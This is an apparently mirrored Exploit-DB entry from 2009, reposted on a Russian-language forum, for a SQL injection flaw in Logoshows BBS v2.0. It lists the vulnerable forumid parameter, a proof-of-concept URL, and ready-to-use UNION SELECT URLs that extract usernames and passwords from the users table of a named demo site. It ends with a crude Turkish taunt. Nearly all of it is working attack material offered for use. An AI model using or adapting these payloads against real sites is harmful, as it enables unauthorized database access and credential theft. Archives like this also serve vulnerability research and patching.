- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9389
- Проверка EDB
-
- Пройдено
- Автор
- RUZGARIN_OGLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4871
- Дата публикации
- 2009-08-07
Код:
__________________________________________________________________________________________________________________________
# Author : Ruzgarin_Oglu
# Script Name : Logoshows BBS v2.0
# Script Download : http://www.logoshows.com/download/bbs88.rar
# Vulnerable Type : Sql Injection
# Demo : http://www.logoshows.com/bbs/
# Licence And Pricing : $1.00 USD
# Special Thanks : By.Ultr@si(Student lol),Fortyseven,Rawage,Daniel-Koo,Subz3rr0,By.Seyfi,Fero,Septemb0x, ve ismini sayamadığım diğer dostlarım...
___________________________________________________________________________________________________________________________________
Exploit:
/globepersonnel_forum.asp?forumid=[SQL]
POC:
http://www.victim.com/[path]/globepersonnel_forum.asp?forumid=[SQL]
Example
Username:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users
Password:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users
----Note----
Herkesin bir s*k*lme zamanı vardır...
Bekleyin beni!
----Note----
# milw0rm.com [2009-08-07]- Источник
- www.exploit-db.com
